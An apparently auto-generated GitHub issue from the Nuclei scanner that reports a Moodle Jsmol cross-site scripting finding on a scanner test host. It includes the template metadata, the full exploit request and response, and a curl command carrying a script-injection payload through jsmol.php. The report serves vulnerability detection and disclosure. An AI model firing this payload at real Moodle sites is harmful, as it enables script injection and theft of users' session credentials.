search

mkrs2404 / tickets

0 stars 0 forks source link

Moodle Jsmol - Cross-Site Scripting (moodle-filter-jmol-xss) found on honey.scanme.sh #59

Closed mkrs2404 closed 2 months ago

mkrs2404 commented 5 months ago

Details: moodle-filter-jmol-xss matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html

Timestamp: Tue Apr 30 19:28:58 +0530 IST 2024

Template Information

Key Value
Name Moodle Jsmol - Cross-Site Scripting
Authors madrobot
Tags moodle, xss
Severity medium
Description Moodle contains a cross-site scripting vulnerability via the Jsmol plugin and may also be susceptible to local file inclusion or server-side-request forgery. An attacker can execute arbitrary script in the browser of an unsuspecting user and steal cookie-based authentication credentials and launch other attacks.
CVSS-Metrics CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CWE-ID CWE-80
CVSS-Score 5.40

Request

GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 363
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:58 GMT

GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=<script>alert('XSS')</script>&mimetype=text/html HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56' 'https://honey.scanme.sh/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html'

Generated by Nuclei v3.2.5